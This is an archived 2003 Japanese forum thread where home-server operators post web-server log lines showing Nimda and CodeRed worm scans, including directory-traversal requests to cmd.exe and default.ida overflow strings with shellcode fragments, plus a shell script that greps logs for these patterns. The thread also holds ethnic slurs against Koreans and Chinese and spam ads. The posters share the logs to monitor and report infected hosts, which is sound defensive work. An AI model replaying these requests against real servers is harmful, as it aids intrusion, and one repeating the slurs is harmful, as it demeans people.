5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

この鯖ワームにやられてます

1 :DNS未登録さん:03/02/08 17:15 ID:???
自宅で鯖も善いけど、管理はちゃんとしようよ。
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!

管理者がこの板みて、対処を期待する。

2 :DNS未登録さん:03/02/08 17:18 ID:OJy9I2w0
2 get!!

おー鯖管理に関する話題だな。
でもな、ワームによってはIP詐称してるのもアルからな
そういうのはどうする>>1 ?


3 :DNS未登録さん:03/02/08 17:31 ID:???
IP詐称されてるってのが分かるだけでも当人?としては
いいかも。やっぱ気持ち悪いじゃん。

ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!


4 :DNS未登録さん:03/02/08 17:35 ID:???
ラストクリスマスキタ━━━━━━(゚∀゚)━━━━━━━!!!!!

5 :DNS未登録さん:03/02/08 17:51 ID:???
218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0

知らんなら本人に気づいて欲しいという意味でも晒しとくよ

6 :DNS未登録さん:03/02/08 18:11 ID:4rLBdIa0
無駄。apache のlogに記録されない様にするのがいい。


7 :DNS未登録さん:03/02/08 18:12 ID:???
>>5
あんたYahooBBかい?

8 :つっこんでおいてあげよう:03/02/08 18:12 ID:???
>>4
それはワム

9 :DNS未登録さん:03/02/08 18:27 ID:mqoXGeCK
>>7
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?


10 :DNS未登録さん:03/02/08 18:39 ID:rLjflOVM
>>6
どうやってやるんですか?

11 :DNS未登録さん:03/02/08 18:44 ID:???
>>9
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・

12 :DNS未登録さん:03/02/08 19:09 ID:???
>>10
ここでも嫁
ttp://www.zdnet.co.jp/help/tips/linux/l0324.html

13 :DNS未登録:03/02/08 20:54 ID:???
>>4
>>8
ワラタ

14 :DNS未登録さん:03/02/08 21:25 ID:???
こういうのってプロバイダに通報した方がいいの?

15 :DNS未登録さん:03/02/08 21:40 ID:OJy9I2w0
>>11
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない)
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。

16 :DNS未登録さん:03/02/09 10:08 ID:???
仮にも管理者が決まっている鯖なら、いくらぐーたらでも
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。

今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。


17 :DNS未登録さん:03/02/10 00:10 ID:???
久々にNIMDA来た
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447

18 :DNS未登録さん:03/02/10 03:48 ID:j1IeEeCl
久々にCodeRed来た
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"


19 :DNS未登録さん:03/02/10 04:21 ID:QfHjKzWg
ぷららのDDNSだけどぷららも結構多いよ。
nslookupで引くとほとんどがぷららさん・・・

20 :DNS未登録さん:03/02/10 15:20 ID:???
>19 いまだにnslookup

( ´,_ゝ`)フ゜ッ

21 :名無しさん@カラアゲうまうま:03/02/10 15:48 ID:???
ネームサーバをさせるわけでもないのに、
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい? >>20


22 :DNS未登録さん:03/02/10 15:53 ID:rOagKP5I
218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"


23 :DNS未登録さん:03/02/10 16:05 ID:rOagKP5I
自動的にワームからのアクセスがあったときに

root@アクセス元IPアドレス

とかに警告メール出すようなソフトだれか作ってくり。

24 :名無しさん@カラアゲうまうま:03/02/10 16:08 ID:???
>>23
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz

25 :DNS未登録さん:03/02/10 16:25 ID:rOagKP5I
>>24
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2

Stop in /tmp/Apache-CodeRed-1.07

26 :DNS未登録さん:03/02/10 16:29 ID:8rUySNNC
http://bbs.1oku.com/bbs/bbs.phtml?id=rantyan
★ココだ★ココだ★

27 : :03/02/10 17:38 ID:???
>>23
警告メールは、やっぱり、

「回線切って、首つって、氏ね」

みたいなの?


28 :DNS未登録さん:03/02/11 11:43 ID:???
>>19
それってぷららのDDNS使ってるからじゃない?
Nimdaはご近所さん攻撃するものだし。

29 :DNS未登録さん:03/02/11 19:06 ID:???
確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。

30 :DNS未登録さん:03/02/12 03:34 ID:???
>>23
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。


31 :DNS未登録さん:03/02/12 22:58 ID:e3CqtLIi
ピコ郎

32 :DNS未登録さん:03/02/13 19:37 ID:???
久々だな。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226

33 :DNS未登録さん:03/02/13 21:11 ID:0FAikRrM
最近codered多くない? しばらくこなかったけど
最近1日3回位くるYO ちなみに屋不ーBB


34 :DNS未登録さん:03/02/13 21:32 ID:5F3nLZxs
[Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe

俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・

35 :32:03/02/13 21:44 ID:???
>>33
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。

36 :32:03/02/13 21:45 ID:???
……と、access_logをgrepして気が付きますた。
全然久々じゃないじゃないか (w

37 :DNS未登録さん:03/02/15 17:01 ID:Dzt44uVK
お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ
もっと勉強してから立てれ

38 :◆5PTORPEDog :03/02/15 17:07 ID:LDMrKlpL
漏れの所も…

その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d

その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d

両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ(涙

39 :DNS未登録さん:03/02/23 01:57 ID:???
一週間で1000リクエストほどワーム来るね

40 :DNS未登録さん:03/02/24 10:42 ID:???
うちもぷららのDDNS使ってますが、サーバ開通直後に
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...


41 :40:03/02/24 16:56 ID:???
やっぱり偶然でした(T_T)

どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...

42 :DNS未登録さん:03/02/28 14:41 ID:???
友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。
相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と
いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。

43 :DNS未登録さん:03/03/08 08:13 ID:???
少々のワームやウイルスはいちいちかまってられないが、
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…

鯖とは関係ない話だがな…


44 :飛石3連休 ◆8772606082 :03/03/09 10:43 ID:q66m7LbT
218.9.76.4 - - [07/Mar/2003:22:22:26 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

いい加減蝋人形にしちゃうよ?!

45 :DNS未登録さん:03/03/09 12:08 ID:???
218.9.6.222 - - [08/Mar/2003:12:13:13 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

いい加減蝋人形にしちゃうよ?!

46 :DNS未登録さん:03/03/09 12:24 ID:???
本日のニムダアクセス
韓国 61.250.216.1
中国 61.132.75.252

47 :DNS未登録さん:03/03/09 13:45 ID:+7NxEJAT
#!/bin/sh

if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi

egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more

exit 0

48 :DNS未登録さん:03/03/09 14:24 ID:???
ワラタ

49 :DNS未登録さん:03/03/10 22:18 ID:???
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいm(__)m

50 :DNS未登録さん:03/03/10 22:20 ID:t9dgL7sB
これはどうなのかな。。。

[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe

51 :DNS未登録さん:03/03/10 22:32 ID:d65/2I7l
  ∋8ノノハ.∩
   川o・-・)ノ <先生!こんなのがありました!
__/ /    /   
\(_ノ ̄ ̄ ̄\
||ヽ|| ̄ ̄ ̄ ̄||
 ...|| ̄ ̄ ̄ ̄||
http://saitama.gasuki.com/saitama/

52 :DNS未登録さん:03/03/11 02:12 ID:???
うちも、チョンとチャンコロばっかりです。

http://www.arearesearch.co.jp/ip-kensaku.html

今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった

53 :DNS未登録さん:03/03/11 06:40 ID:???



       ま    た    中    国    か





54 :DNS未登録さん:03/03/12 23:51 ID:???
default.ida?XXXXX...増殖中。
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar

55 :DNS未登録さん:03/03/13 15:32 ID:EzD2j/Xg
上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね?
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、


56 :DNS未登録さん:03/03/13 15:34 ID:j2B84i1p
http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし!!★超おすすめ★

57 :DNS未登録さん:03/03/13 15:56 ID:???
>>52
国際的ですね(w

58 :山崎渉:03/03/13 16:55 ID:???
(^^)

59 :DNS未登録さん:03/03/13 22:31 ID:C6UKAtSK
ほぼ毎日、韓国、中国。たまに日本。

60 :DNS未登録さん:03/03/14 03:03 ID:???
韓国と中国がものすごく多い。
あと、日本国内だと普通の企業とか。

61 :DNS未登録さん:03/03/14 11:03 ID:???
ここ数日はCodeRed IIが多いですね、国内外を問わず。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。

62 :DNS未登録さん:03/03/14 23:03 ID:SKFFyD7J
我々に直接的な害はないんですがね。
見てて気持ち悪いですよ。

63 :DNS未登録さん:03/03/15 23:45 ID:7XBHLTMt
こんなの出てた
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276


64 :DNS未登録さん:03/03/16 00:41 ID:???
CodeRedII多いなぁ
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX


65 :DNS未登録さん:03/03/16 12:03 ID:YmIrJiRn
218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX
流行ってるね。

66 :DNS未登録さん:03/03/16 21:36 ID:/QhqGxAD
設置者は居ても、管理者が居ない鯖が多いということで

67 :tantei:03/03/16 21:52 ID:???
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
 直通  090−8505−3086
URL  http://www.h5.dion.ne.jp/~grobal/
メール  hentaimtt@k9.dion.ne.jp
   グローバル探偵事務局 



68 :俺の鯖も・・・しつこく来る:03/03/16 22:09 ID:???
003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1"
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"


69 :DNS未登録さん:03/03/18 15:13 ID:???
>68
規約ってなんだっ

70 :DNS未登録さん:03/03/19 04:21 ID:???
CodeRedIIウザー(´Д`;
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?

中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。

71 :DNS未登録さん:03/03/20 01:39 ID:???
迷惑。マシンごと逝ってくれ、とくに220.13.136.85

YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX


72 :DNS未登録さん:03/03/20 10:39 ID:???
>>71
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。

73 :404.HDML ◆StMXML.EXE :03/03/23 04:15 ID:???
61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、
www.okxa.comというドメインのサイトですた。

何、ココ?エロゲサイト?

74 :DNS未登録さん:03/03/25 13:12 ID:kTD0oBas
うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。

75 :DNS未登録さん:03/03/25 15:51 ID:???
>>73
下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?

76 :DNS未登録さん:03/03/26 06:30 ID:???
まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから
身に覚えのある人はパッチをあてて欲しいですね

77 :DNS未登録さん:03/04/02 23:02 ID:???
最近やたらCodeRedII多くないかい?
218.***.***.***から目茶苦茶(100/day程度)来るんだけど


あーうぜー

78 :DNS未登録さん:03/04/02 23:14 ID:???
初めて見た。

210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない

79 :DNS未登録さん:03/04/03 00:21 ID:???
SYN Flood Attackしてくる香具師もなんとかしる

80 :DNS未登録さん:03/04/05 17:49 ID:???
>78
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね?
相手はコーリャンのIISでした。

81 :DNS未登録さん:03/04/06 10:36 ID:???
211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
